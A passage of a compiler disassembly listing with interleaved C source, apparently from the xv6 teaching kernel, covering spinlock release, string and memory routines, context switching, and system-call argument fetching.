801045ba: 0f 85 73 ff ff ff jne 80104533 <acquire+0x13> void acquire(struct spinlock *lk) { pushcli(); // disable interrupts to avoid deadlock. if(holding(lk)) panic("acquire"); 801045c0: 83 ec 0c sub $0xc,%esp 801045c3: 68 2f 79 10 80 push $0x8010792f 801045c8: e8 a3 bd ff ff call 80100370 <panic> 801045cd: 8d 76 00 lea 0x0(%esi),%esi 801045d0 <popcli>: mycpu()->ncli += 1; } void popcli(void) { 801045d0: 55 push %ebp 801045d1: 89 e5 mov %esp,%ebp 801045d3: 83 ec 08 sub $0x8,%esp static inline uint readeflags(void) { uint eflags; asm volatile("pushfl; popl %0" : "=r" (eflags)); 801045d6: 9c pushf 801045d7: 58 pop %eax if(readeflags()&FL_IF) 801045d8: f6 c4 02 test $0x2,%ah 801045db: 75 52 jne 8010462f <popcli+0x5f> panic("popcli - interruptible"); if(--mycpu()->ncli < 0) 801045dd: e8 fe f0 ff ff call 801036e0 <mycpu> 801045e2: 8b 88 a4 00 00 00 mov 0xa4(%eax),%ecx 801045e8: 8d 51 ff lea -0x1(%ecx),%edx 801045eb: 85 d2 test %edx,%edx 801045ed: 89 90 a4 00 00 00 mov %edx,0xa4(%eax) 801045f3: 78 2d js 80104622 <popcli+0x52> panic("popcli"); if(mycpu()->ncli == 0 && mycpu()->intena) 801045f5: e8 e6 f0 ff ff call 801036e0 <mycpu> 801045fa: 8b 90 a4 00 00 00 mov 0xa4(%eax),%edx 80104600: 85 d2 test %edx,%edx 80104602: 74 0c je 80104610 <popcli+0x40> sti(); } 80104604: c9 leave 80104605: c3 ret 80104606: 8d 76 00 lea 0x0(%esi),%esi 80104609: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi { if(readeflags()&FL_IF) panic("popcli - interruptible"); if(--mycpu()->ncli < 0) panic("popcli"); if(mycpu()->ncli == 0 && mycpu()->intena) 80104610: e8 cb f0 ff ff call 801036e0 <mycpu> 80104615: 8b 80 a8 00 00 00 mov 0xa8(%eax),%eax 8010461b: 85 c0 test %eax,%eax 8010461d: 74 e5 je 80104604 <popcli+0x34> } static inline void sti(void) { asm volatile("sti"); 8010461f: fb sti sti(); } 80104620: c9 leave 80104621: c3 ret popcli(void) { if(readeflags()&FL_IF) panic("popcli - interruptible"); if(--mycpu()->ncli < 0) panic("popcli"); 80104622: 83 ec 0c sub $0xc,%esp 80104625: 68 4e 79 10 80 push $0x8010794e 8010462a: e8 41 bd ff ff call 80100370 <panic> void popcli(void) { if(readeflags()&FL_IF) panic("popcli - interruptible"); 8010462f: 83 ec 0c sub $0xc,%esp 80104632: 68 37 79 10 80 push $0x80107937 80104637: e8 34 bd ff ff call 80100370 <panic> 8010463c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80104640 <release>: } // Release the lock. void release(struct spinlock *lk) { 80104640: 55 push %ebp 80104641: 89 e5 mov %esp,%ebp 80104643: 56 push %esi 80104644: 53 push %ebx 80104645: 8b 5d 08 mov 0x8(%ebp),%ebx // Check whether this cpu is holding the lock. int holding(struct spinlock *lock) { return lock->locked && lock->cpu == mycpu(); 80104648: 8b 03 mov (%ebx),%eax 8010464a: 85 c0 test %eax,%eax 8010464c: 75 12 jne 80104660 <release+0x20> // Release the lock. void release(struct spinlock *lk) { if(!holding(lk)) panic("release"); 8010464e: 83 ec 0c sub $0xc,%esp 80104651: 68 55 79 10 80 push $0x80107955 80104656: e8 15 bd ff ff call 80100370 <panic> 8010465b: 90 nop 8010465c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi // Check whether this cpu is holding the lock. int holding(struct spinlock *lock) { return lock->locked && lock->cpu == mycpu(); 80104660: 8b 73 08 mov 0x8(%ebx),%esi 80104663: e8 78 f0 ff ff call 801036e0 <mycpu> 80104668: 39 c6 cmp %eax,%esi 8010466a: 75 e2 jne 8010464e <release+0xe> release(struct spinlock *lk) { if(!holding(lk)) panic("release"); lk->pcs[0] = 0; 8010466c: c7 43 0c 00 00 00 00 movl $0x0,0xc(%ebx) lk->cpu = 0; 80104673: c7 43 08 00 00 00 00 movl $0x0,0x8(%ebx) // Tell the C compiler and the processor to not move loads or stores // past this point, to ensure that all the stores in the critical // section are visible to other cores before the lock is released. // Both the C compiler and the hardware may re-order loads and // stores; __sync_synchronize() tells them both not to. __sync_synchronize(); 8010467a: f0 83 0c 24 00 lock orl $0x0,(%esp) // Release the lock, equivalent to lk->locked = 0. // This code can't use a C assignment, since it might // not be atomic. A real OS would use C atomics here. asm volatile("movl $0, %0" : "+m" (lk->locked) : ); 8010467f: c7 03 00 00 00 00 movl $0x0,(%ebx) popcli(); } 80104685: 8d 65 f8 lea -0x8(%ebp),%esp 80104688: 5b pop %ebx 80104689: 5e pop %esi 8010468a: 5d pop %ebp // Release the lock, equivalent to lk->locked = 0. // This code can't use a C assignment, since it might // not be atomic. A real OS would use C atomics here. asm volatile("movl $0, %0" : "+m" (lk->locked) : ); popcli(); 8010468b: e9 40 ff ff ff jmp 801045d0 <popcli> 80104690 <memset>: #include "types.h" #include "x86.h" void* memset(void *dst, int c, uint n) { 80104690: 55 push %ebp 80104691: 89 e5 mov %esp,%ebp 80104693: 57 push %edi 80104694: 53 push %ebx 80104695: 8b 55 08 mov 0x8(%ebp),%edx 80104698: 8b 4d 10 mov 0x10(%ebp),%ecx if ((int)dst%4 == 0 && n%4 == 0){ 8010469b: f6 c2 03 test $0x3,%dl 8010469e: 75 05 jne 801046a5 <memset+0x15> 801046a0: f6 c1 03 test $0x3,%cl 801046a3: 74 13 je 801046b8 <memset+0x28> } static inline void stosb(void *addr, int data, int cnt) { asm volatile("cld; rep stosb" : 801046a5: 89 d7 mov %edx,%edi 801046a7: 8b 45 0c mov 0xc(%ebp),%eax 801046aa: fc cld 801046ab: f3 aa rep stos %al,%es:(%edi) c &= 0xFF; stosl(dst, (c<<24)|(c<<16)|(c<<8)|c, n/4); } else stosb(dst, c, n); return dst; } 801046ad: 5b pop %ebx 801046ae: 89 d0 mov %edx,%eax 801046b0: 5f pop %edi 801046b1: 5d pop %ebp 801046b2: c3 ret 801046b3: 90 nop 801046b4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi void* memset(void *dst, int c, uint n) { if ((int)dst%4 == 0 && n%4 == 0){ c &= 0xFF; 801046b8: 0f b6 7d 0c movzbl 0xc(%ebp),%edi } static inline void stosl(void *addr, int data, int cnt) { asm volatile("cld; rep stosl" : 801046bc: c1 e9 02 shr $0x2,%ecx 801046bf: 89 fb mov %edi,%ebx 801046c1: 89 f8 mov %edi,%eax 801046c3: c1 e3 18 shl $0x18,%ebx 801046c6: c1 e0 10 shl $0x10,%eax 801046c9: 09 d8 or %ebx,%eax 801046cb: 09 f8 or %edi,%eax 801046cd: c1 e7 08 shl $0x8,%edi 801046d0: 09 f8 or %edi,%eax 801046d2: 89 d7 mov %edx,%edi 801046d4: fc cld 801046d5: f3 ab rep stos %eax,%es:(%edi) stosl(dst, (c<<24)|(c<<16)|(c<<8)|c, n/4); } else stosb(dst, c, n); return dst; } 801046d7: 5b pop %ebx 801046d8: 89 d0 mov %edx,%eax 801046da: 5f pop %edi 801046db: 5d pop %ebp 801046dc: c3 ret 801046dd: 8d 76 00 lea 0x0(%esi),%esi 801046e0 <memcmp>: int memcmp(const void *v1, const void *v2, uint n) { 801046e0: 55 push %ebp 801046e1: 89 e5 mov %esp,%ebp 801046e3: 57 push %edi 801046e4: 56 push %esi 801046e5: 8b 45 10 mov 0x10(%ebp),%eax 801046e8: 53 push %ebx 801046e9: 8b 75 0c mov 0xc(%ebp),%esi 801046ec: 8b 5d 08 mov 0x8(%ebp),%ebx const uchar *s1, *s2; s1 = v1; s2 = v2; while(n-- > 0){ 801046ef: 85 c0 test %eax,%eax 801046f1: 74 29 je 8010471c <memcmp+0x3c> if(*s1 != *s2) 801046f3: 0f b6 13 movzbl (%ebx),%edx 801046f6: 0f b6 0e movzbl (%esi),%ecx 801046f9: 38 d1 cmp %dl,%cl 801046fb: 75 2b jne 80104728 <memcmp+0x48> 801046fd: 8d 78 ff lea -0x1(%eax),%edi 80104700: 31 c0 xor %eax,%eax 80104702: eb 14 jmp 80104718 <memcmp+0x38> 80104704: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80104708: 0f b6 54 03 01 movzbl 0x1(%ebx,%eax,1),%edx 8010470d: 83 c0 01 add $0x1,%eax 80104710: 0f b6 0c 06 movzbl (%esi,%eax,1),%ecx 80104714: 38 ca cmp %cl,%dl 80104716: 75 10 jne 80104728 <memcmp+0x48> { const uchar *s1, *s2; s1 = v1; s2 = v2; while(n-- > 0){ 80104718: 39 f8 cmp %edi,%eax 8010471a: 75 ec jne 80104708 <memcmp+0x28> return *s1 - *s2; s1++, s2++; } return 0; } 8010471c: 5b pop %ebx if(*s1 != *s2) return *s1 - *s2; s1++, s2++; } return 0; 8010471d: 31 c0 xor %eax,%eax } 8010471f: 5e pop %esi 80104720: 5f pop %edi 80104721: 5d pop %ebp 80104722: c3 ret 80104723: 90 nop 80104724: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi s1 = v1; s2 = v2; while(n-- > 0){ if(*s1 != *s2) return *s1 - *s2; 80104728: 0f b6 c2 movzbl %dl,%eax s1++, s2++; } return 0; } 8010472b: 5b pop %ebx s1 = v1; s2 = v2; while(n-- > 0){ if(*s1 != *s2) return *s1 - *s2; 8010472c: 29 c8 sub %ecx,%eax s1++, s2++; } return 0; } 8010472e: 5e pop %esi 8010472f: 5f pop %edi 80104730: 5d pop %ebp 80104731: c3 ret 80104732: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80104739: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104740 <memmove>: void* memmove(void *dst, const void *src, uint n) { 80104740: 55 push %ebp 80104741: 89 e5 mov %esp,%ebp 80104743: 56 push %esi 80104744: 53 push %ebx 80104745: 8b 45 08 mov 0x8(%ebp),%eax 80104748: 8b 75 0c mov 0xc(%ebp),%esi 8010474b: 8b 5d 10 mov 0x10(%ebp),%ebx const char *s; char *d; s = src; d = dst; if(s < d && s + n > d){ 8010474e: 39 c6 cmp %eax,%esi 80104750: 73 2e jae 80104780 <memmove+0x40> 80104752: 8d 0c 1e lea (%esi,%ebx,1),%ecx 80104755: 39 c8 cmp %ecx,%eax 80104757: 73 27 jae 80104780 <memmove+0x40> s += n; d += n; while(n-- > 0) 80104759: 85 db test %ebx,%ebx 8010475b: 8d 53 ff lea -0x1(%ebx),%edx 8010475e: 74 17 je 80104777 <memmove+0x37> *--d = *--s; 80104760: 29 d9 sub %ebx,%ecx 80104762: 89 cb mov %ecx,%ebx 80104764: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80104768: 0f b6 0c 13 movzbl (%ebx,%edx,1),%ecx 8010476c: 88 0c 10 mov %cl,(%eax,%edx,1) s = src; d = dst; if(s < d && s + n > d){ s += n; d += n; while(n-- > 0) 8010476f: 83 ea 01 sub $0x1,%edx 80104772: 83 fa ff cmp $0xffffffff,%edx 80104775: 75 f1 jne 80104768 <memmove+0x28> } else while(n-- > 0) *d++ = *s++; return dst; } 80104777: 5b pop %ebx 80104778: 5e pop %esi 80104779: 5d pop %ebp 8010477a: c3 ret 8010477b: 90 nop 8010477c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi s += n; d += n; while(n-- > 0) *--d = *--s; } else while(n-- > 0) 80104780: 31 d2 xor %edx,%edx 80104782: 85 db test %ebx,%ebx 80104784: 74 f1 je 80104777 <memmove+0x37> 80104786: 8d 76 00 lea 0x0(%esi),%esi 80104789: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi *d++ = *s++; 80104790: 0f b6 0c 16 movzbl (%esi,%edx,1),%ecx 80104794: 88 0c 10 mov %cl,(%eax,%edx,1) 80104797: 83 c2 01 add $0x1,%edx s += n; d += n; while(n-- > 0) *--d = *--s; } else while(n-- > 0) 8010479a: 39 d3 cmp %edx,%ebx 8010479c: 75 f2 jne 80104790 <memmove+0x50> *d++ = *s++; return dst; } 8010479e: 5b pop %ebx 8010479f: 5e pop %esi 801047a0: 5d pop %ebp 801047a1: c3 ret 801047a2: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801047a9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801047b0 <memcpy>: // memcpy exists to placate GCC. Use memmove. void* memcpy(void *dst, const void *src, uint n) { 801047b0: 55 push %ebp 801047b1: 89 e5 mov %esp,%ebp return memmove(dst, src, n); } 801047b3: 5d pop %ebp // memcpy exists to placate GCC. Use memmove. void* memcpy(void *dst, const void *src, uint n) { return memmove(dst, src, n); 801047b4: eb 8a jmp 80104740 <memmove> 801047b6: 8d 76 00 lea 0x0(%esi),%esi 801047b9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801047c0 <strncmp>: } int strncmp(const char *p, const char *q, uint n) { 801047c0: 55 push %ebp 801047c1: 89 e5 mov %esp,%ebp 801047c3: 57 push %edi 801047c4: 56 push %esi 801047c5: 8b 4d 10 mov 0x10(%ebp),%ecx 801047c8: 53 push %ebx 801047c9: 8b 7d 08 mov 0x8(%ebp),%edi 801047cc: 8b 75 0c mov 0xc(%ebp),%esi while(n > 0 && *p && *p == *q) 801047cf: 85 c9 test %ecx,%ecx 801047d1: 74 37 je 8010480a <strncmp+0x4a> 801047d3: 0f b6 17 movzbl (%edi),%edx 801047d6: 0f b6 1e movzbl (%esi),%ebx 801047d9: 84 d2 test %dl,%dl 801047db: 74 3f je 8010481c <strncmp+0x5c> 801047dd: 38 d3 cmp %dl,%bl 801047df: 75 3b jne 8010481c <strncmp+0x5c> 801047e1: 8d 47 01 lea 0x1(%edi),%eax 801047e4: 01 cf add %ecx,%edi 801047e6: eb 1b jmp 80104803 <strncmp+0x43> 801047e8: 90 nop 801047e9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801047f0: 0f b6 10 movzbl (%eax),%edx 801047f3: 84 d2 test %dl,%dl 801047f5: 74 21 je 80104818 <strncmp+0x58> 801047f7: 0f b6 19 movzbl (%ecx),%ebx 801047fa: 83 c0 01 add $0x1,%eax 801047fd: 89 ce mov %ecx,%esi 801047ff: 38 da cmp %bl,%dl 80104801: 75 19 jne 8010481c <strncmp+0x5c> 80104803: 39 c7 cmp %eax,%edi n--, p++, q++; 80104805: 8d 4e 01 lea 0x1(%esi),%ecx } int strncmp(const char *p, const char *q, uint n) { while(n > 0 && *p && *p == *q) 80104808: 75 e6 jne 801047f0 <strncmp+0x30> n--, p++, q++; if(n == 0) return 0; return (uchar)*p - (uchar)*q; } 8010480a: 5b pop %ebx strncmp(const char *p, const char *q, uint n) { while(n > 0 && *p && *p == *q) n--, p++, q++; if(n == 0) return 0; 8010480b: 31 c0 xor %eax,%eax return (uchar)*p - (uchar)*q; } 8010480d: 5e pop %esi 8010480e: 5f pop %edi 8010480f: 5d pop %ebp 80104810: c3 ret 80104811: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80104818: 0f b6 5e 01 movzbl 0x1(%esi),%ebx { while(n > 0 && *p && *p == *q) n--, p++, q++; if(n == 0) return 0; return (uchar)*p - (uchar)*q; 8010481c: 0f b6 c2 movzbl %dl,%eax 8010481f: 29 d8 sub %ebx,%eax } 80104821: 5b pop %ebx 80104822: 5e pop %esi 80104823: 5f pop %edi 80104824: 5d pop %ebp 80104825: c3 ret 80104826: 8d 76 00 lea 0x0(%esi),%esi 80104829: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104830 <strncpy>: char* strncpy(char *s, const char *t, int n) { 80104830: 55 push %ebp 80104831: 89 e5 mov %esp,%ebp 80104833: 56 push %esi 80104834: 53 push %ebx 80104835: 8b 45 08 mov 0x8(%ebp),%eax 80104838: 8b 5d 0c mov 0xc(%ebp),%ebx 8010483b: 8b 4d 10 mov 0x10(%ebp),%ecx char *os; os = s; while(n-- > 0 && (*s++ = *t++) != 0) 8010483e: 89 c2 mov %eax,%edx 80104840: eb 19 jmp 8010485b <strncpy+0x2b> 80104842: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80104848: 83 c3 01 add $0x1,%ebx 8010484b: 0f b6 4b ff movzbl -0x1(%ebx),%ecx 8010484f: 83 c2 01 add $0x1,%edx 80104852: 84 c9 test %cl,%cl 80104854: 88 4a ff mov %cl,-0x1(%edx) 80104857: 74 09 je 80104862 <strncpy+0x32> 80104859: 89 f1 mov %esi,%ecx 8010485b: 85 c9 test %ecx,%ecx 8010485d: 8d 71 ff lea -0x1(%ecx),%esi 80104860: 7f e6 jg 80104848 <strncpy+0x18> ; while(n-- > 0) 80104862: 31 c9 xor %ecx,%ecx 80104864: 85 f6 test %esi,%esi 80104866: 7e 17 jle 8010487f <strncpy+0x4f> 80104868: 90 nop 80104869: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi *s++ = 0; 80104870: c6 04 0a 00 movb $0x0,(%edx,%ecx,1) 80104874: 89 f3 mov %esi,%ebx 80104876: 83 c1 01 add $0x1,%ecx 80104879: 29 cb sub %ecx,%ebx char *os; os = s; while(n-- > 0 && (*s++ = *t++) != 0) ; while(n-- > 0) 8010487b: 85 db test %ebx,%ebx 8010487d: 7f f1 jg 80104870 <strncpy+0x40> *s++ = 0; return os; } 8010487f: 5b pop %ebx 80104880: 5e pop %esi 80104881: 5d pop %ebp 80104882: c3 ret 80104883: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80104889: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104890 <safestrcpy>: // Like strncpy but guaranteed to NUL-terminate. char* safestrcpy(char *s, const char *t, int n) { 80104890: 55 push %ebp 80104891: 89 e5 mov %esp,%ebp 80104893: 56 push %esi 80104894: 53 push %ebx 80104895: 8b 4d 10 mov 0x10(%ebp),%ecx 80104898: 8b 45 08 mov 0x8(%ebp),%eax 8010489b: 8b 55 0c mov 0xc(%ebp),%edx char *os; os = s; if(n <= 0) 8010489e: 85 c9 test %ecx,%ecx 801048a0: 7e 26 jle 801048c8 <safestrcpy+0x38> 801048a2: 8d 74 0a ff lea -0x1(%edx,%ecx,1),%esi 801048a6: 89 c1 mov %eax,%ecx 801048a8: eb 17 jmp 801048c1 <safestrcpy+0x31> 801048aa: 8d b6 00 00 00 00 lea 0x0(%esi),%esi return os; while(--n > 0 && (*s++ = *t++) != 0) 801048b0: 83 c2 01 add $0x1,%edx 801048b3: 0f b6 5a ff movzbl -0x1(%edx),%ebx 801048b7: 83 c1 01 add $0x1,%ecx 801048ba: 84 db test %bl,%bl 801048bc: 88 59 ff mov %bl,-0x1(%ecx) 801048bf: 74 04 je 801048c5 <safestrcpy+0x35> 801048c1: 39 f2 cmp %esi,%edx 801048c3: 75 eb jne 801048b0 <safestrcpy+0x20> ; *s = 0; 801048c5: c6 01 00 movb $0x0,(%ecx) return os; } 801048c8: 5b pop %ebx 801048c9: 5e pop %esi 801048ca: 5d pop %ebp 801048cb: c3 ret 801048cc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 801048d0 <strlen>: int strlen(const char *s) { 801048d0: 55 push %ebp int n; for(n = 0; s[n]; n++) 801048d1: 31 c0 xor %eax,%eax return os; } int strlen(const char *s) { 801048d3: 89 e5 mov %esp,%ebp 801048d5: 8b 55 08 mov 0x8(%ebp),%edx int n; for(n = 0; s[n]; n++) 801048d8: 80 3a 00 cmpb $0x0,(%edx) 801048db: 74 0c je 801048e9 <strlen+0x19> 801048dd: 8d 76 00 lea 0x0(%esi),%esi 801048e0: 83 c0 01 add $0x1,%eax 801048e3: 80 3c 02 00 cmpb $0x0,(%edx,%eax,1) 801048e7: 75 f7 jne 801048e0 <strlen+0x10> ; return n; } 801048e9: 5d pop %ebp 801048ea: c3 ret 801048eb <swtch>: # Save current register context in old # and then load register context from new. .globl swtch swtch: movl 4(%esp), %eax 801048eb: 8b 44 24 04 mov 0x4(%esp),%eax movl 8(%esp), %edx 801048ef: 8b 54 24 08 mov 0x8(%esp),%edx # Save old callee-save registers pushl %ebp 801048f3: 55 push %ebp pushl %ebx 801048f4: 53 push %ebx pushl %esi 801048f5: 56 push %esi pushl %edi 801048f6: 57 push %edi # Switch stacks movl %esp, (%eax) 801048f7: 89 20 mov %esp,(%eax) movl %edx, %esp 801048f9: 89 d4 mov %edx,%esp # Load new callee-save registers popl %edi 801048fb: 5f pop %edi popl %esi 801048fc: 5e pop %esi popl %ebx 801048fd: 5b pop %ebx popl %ebp 801048fe: 5d pop %ebp ret 801048ff: c3 ret 80104900 <fetchint>: // to a saved program counter, and then the first argument. // Fetch the int at addr from the current process. int fetchint(uint addr, int *ip) { 80104900: 55 push %ebp 80104901: 89 e5 mov %esp,%ebp 80104903: 53 push %ebx 80104904: 83 ec 04 sub $0x4,%esp 80104907: 8b 5d 08 mov 0x8(%ebp),%ebx struct proc *curproc = myproc(); 8010490a: e8 71 ee ff ff call 80103780 <myproc> if(addr >= curproc->sz || addr+4 > curproc->sz) 8010490f: 8b 00 mov (%eax),%eax 80104911: 39 d8 cmp %ebx,%eax 80104913: 76 1b jbe 80104930 <fetchint+0x30> 80104915: 8d 53 04 lea 0x4(%ebx),%edx 80104918: 39 d0 cmp %edx,%eax 8010491a: 72 14 jb 80104930 <fetchint+0x30> return -1; *ip = *(int*)(addr); 8010491c: 8b 45 0c mov 0xc(%ebp),%eax 8010491f: 8b 13 mov (%ebx),%edx 80104921: 89 10 mov %edx,(%eax) return 0; 80104923: 31 c0 xor %eax,%eax } 80104925: 83 c4 04 add $0x4,%esp 80104928: 5b pop %ebx 80104929: 5d pop %ebp 8010492a: c3 ret 8010492b: 90 nop 8010492c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi fetchint(uint addr, int *ip) { struct proc *curproc = myproc(); if(addr >= curproc->sz || addr+4 > curproc->sz) return -1; 80104930: b8 ff ff ff ff mov $0xffffffff,%eax 80104935: eb ee jmp 80104925 <fetchint+0x25> 80104937: 89 f6 mov %esi,%esi 80104939: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104940 <fetchstr>: // Fetch the nul-terminated string at addr from the current process. // Doesn't actually copy the string - just sets *pp to point at it. // Returns length of string, not including nul. int fetchstr(uint addr, char **pp) { 80104940: 55 push %ebp 80104941: 89 e5 mov %esp,%ebp 80104943: 53 push %ebx 80104944: 83 ec 04 sub $0x4,%esp 80104947: 8b 5d 08 mov 0x8(%ebp),%ebx char *s, *ep; struct proc *curproc = myproc(); 8010494a: e8 31 ee ff ff call 80103780 <myproc> if(addr >= curproc->sz) 8010494f: 39 18 cmp %ebx,(%eax) 80104951: 76 29 jbe 8010497c <fetchstr+0x3c> return -1; *pp = (char*)addr; 80104953: 8b 4d 0c mov 0xc(%ebp),%ecx 80104956: 89 da mov %ebx,%edx 80104958: 89 19 mov %ebx,(%ecx) ep = (char*)curproc->sz; 8010495a: 8b 00 mov (%eax),%eax for(s = *pp; s < ep; s++){ 8010495c: 39 c3 cmp %eax,%ebx 8010495e: 73 1c jae 8010497c <fetchstr+0x3c> if(*s == 0) 80104960: 80 3b 00 cmpb $0x0,(%ebx) 80104963: 75 10 jne 80104975 <fetchstr+0x35> 80104965: eb 29 jmp 80104990 <fetchstr+0x50> 80104967: 89 f6 mov %esi,%esi 80104969: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104970: 80 3a 00 cmpb $0x0,(%edx) 80104973: 74 1b je 80104990 <fetchstr+0x50> if(addr >= curproc->sz) return -1; *pp = (char*)addr; ep = (char*)curproc->sz; for(s = *pp; s < ep; s++){ 80104975: 83 c2 01 add $0x1,%edx 80104978: 39 d0 cmp %edx,%eax 8010497a: 77 f4 ja 80104970 <fetchstr+0x30> if(*s == 0) return s - *pp; } return -1; } 8010497c: 83 c4 04 add $0x4,%esp { char *s, *ep; struct proc *curproc = myproc(); if(addr >= curproc->sz) return -1; 8010497f: b8 ff ff ff ff mov $0xffffffff,%eax for(s = *pp; s < ep; s++){ if(*s == 0) return s - *pp; } return -1; } 80104984: 5b pop %ebx 80104985: 5d pop %ebp 80104986: c3 ret 80104987: 89 f6 mov %esi,%esi 80104989: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80104990: 83 c4 04 add $0x4,%esp return -1; *pp = (char*)addr; ep = (char*)curproc->sz; for(s = *pp; s < ep; s++){ if(*s == 0) return s - *pp; 80104993: 89 d0 mov %edx,%eax 80104995: 29 d8 sub %ebx,%eax } return -1; } 80104997: 5b pop %ebx 80104998: 5d pop %ebp 80104999: c3 ret 8010499a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 801049a0 <argint>: // Fetch the nth 32-bit system call argument. int argint(int n, int *ip) { 801049a0: 55 push %ebp 801049a1: 89 e5 mov %esp,%ebp 801049a3: 56 push %esi 801049a4: 53 push %ebx return fetchint((myproc()->tf->esp) + 4 + 4*n, ip); 801049a5: e8 d6 ed ff ff call 80103780 <myproc> 801049aa: 8b 40 18 mov 0x18(%eax),%eax 801049ad: 8b 55 08 mov 0x8(%ebp),%edx 801049b0: 8b 40 44 mov 0x44(%eax),%eax 801049b3: 8d 1c 90 lea (%eax,%edx,4),%ebx // Fetch the int at addr from the current process. int fetchint(uint addr, int *ip) { struct proc *curproc = myproc(); 801049b6: e8 c5 ed ff ff call 80103780 <myproc> if(addr >= curproc->sz || addr+4 > curproc->sz) 801049bb: 8b 00 mov (%eax),%eax // Fetch the nth 32-bit system call argument. int argint(int n, int *ip) { return fetchint((myproc()->tf->esp) + 4 + 4*n, ip); 801049bd: 8d 73 04 lea 0x4(%ebx),%esi int fetchint(uint addr, int *ip) { struct proc *curproc = myproc(); if(addr >= curproc->sz || addr+4 > curproc->sz) 801049c0: 39 c6 cmp %eax,%esi 801049c2: 73 1c jae 801049e0 <argint+0x40> 801049c4: 8d 53 08 lea 0x8(%ebx),%edx 801049c7: 39 d0 cmp %edx,%eax 801049c9: 72 15 jb 801049e0 <argint+0x40> return -1; *ip = *(int*)(addr); 801049cb: 8b 45 0c mov 0xc(%ebp),%eax 801049ce: 8b 53 04 mov 0x4(%ebx),%edx 801049d1: 89 10 mov %edx,(%eax) return 0; 801049d3: 31 c0 xor %eax,%eax // Fetch the nth 32-bit system call argument. int argint(int n, int *ip) { return fetchint((myproc()->tf->esp) + 4 + 4*n, ip); } 801049d5: 5b pop %ebx 801049d6: 5e pop %esi 801049d7: 5d pop %ebp 801049d8: c3 ret 801049d9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi fetchint(uint addr, int *ip) { struct proc *curproc = myproc(); if(addr >= curproc->sz || addr+4 > curproc->sz) return -1; 801049e0: b8 ff ff ff ff mov $0xffffffff,%eax 801049e5: eb ee jmp 801049d5 <argint+0x35> 801049e7: 89 f6 mov %esi,%esi 801049e9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801049f0 <argptr>: // Fetch the nth word-sized system call argument as a pointer // to a block of memory of size bytes. Check that the pointer // lies within the process address space. int argptr(int n, char **pp, int size) { 801049f0: 55 push %ebp 801049f1: 89 e5 mov %esp,%ebp 801049f3: 56 push %esi 801049f4: 53 push %ebx 801049f5: 83 ec 10 sub $0x10,%esp 801049f8: 8b 5d 10 mov 0x10(%ebp),%ebx int i; struct proc *curproc = myproc(); 801049fb: e8 80 ed ff ff call 80103780 <myproc> 80104a00: 89 c6 mov %eax,%esi if(argint(n, &i) < 0) 80104a02: 8d 45 f4 lea -0xc(%ebp),%eax 80104a05: 83 ec 08 sub $0x8,%esp 80104a08: 50 push %eax 80104a09: ff 75 08 pushl 0x8(%ebp) 80104a0c: e8 8f ff ff ff call 801049a0 <argint> return -1; if(size < 0 || (uint)i >= curproc->sz || (uint)i+size > curproc->sz) 80104a11: c1 e8 1f shr $0x1f,%eax 80104a14: 83 c4 10 add $0x10,%esp 80104a17: 84 c0 test %al,%al 80104a19: 75 2d jne 80104a48 <argptr+0x58> 80104a1b: 89 d8 mov %ebx,%eax 80104a1d: c1 e8 1f shr $0x1f,%eax 80104a20: 84 c0 test %al,%al 80104a22: 75 24 jne 80104a48 <argptr+0x58> 80104a24: 8b 16 mov (%esi),%edx 80104a26: 8b 45 f4 mov -0xc(%ebp),%eax 80104a29: 39 c2 cmp %eax,%edx 80104a2b: 76 1b jbe 80104a48 <argptr+0x58> 80104a2d: 01 c3 add %eax,%ebx 80104a2f: 39 da cmp %ebx,%edx 80104a31: 72 15 jb 80104a48 <argptr+0x58> return -1; *pp = (char*)i; 80104a33: 8b 55 0c mov 0xc(%ebp),%edx 80104a36: 89 02 mov %eax,(%edx) return 0; 80104a38: 31 c0 xor %eax,%eax } 80104a3a: 8d 65 f8 lea -0x8(%ebp),%esp 80104a3d: 5b pop %ebx 80104a3e: 5e pop %esi 80104a3f: 5d pop %ebp 80104a40: c3 ret 80104a41: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi struct proc *curproc = myproc(); if(argint(n, &i) < 0) return -1; if(size < 0 || (uint)i >= curproc->sz || (uint)i+size > curproc->sz) return -1; 80104a48: b8 ff ff ff ff mov $0xffffffff,%eax 80104a4d: eb eb jmp 80104a3a <argptr+0x4a> 80104a4f: 90 nop 80104a50 <argstr>: // Check that the pointer is valid and the string is nul-terminated. // (There is no shared writable memory, so the string can't change // between this check and being used by the kernel.) int argstr(int n, char **pp) { 80104a50: 55 push %ebp 80104a51: 89 e5 mov %esp,%ebp 80104a53: 83 ec 20 sub $0x20,%esp int addr; if(argint(n, &addr) < 0) 80104a56: 8d 45 f4 lea -0xc(%ebp),%eax 80104a59: 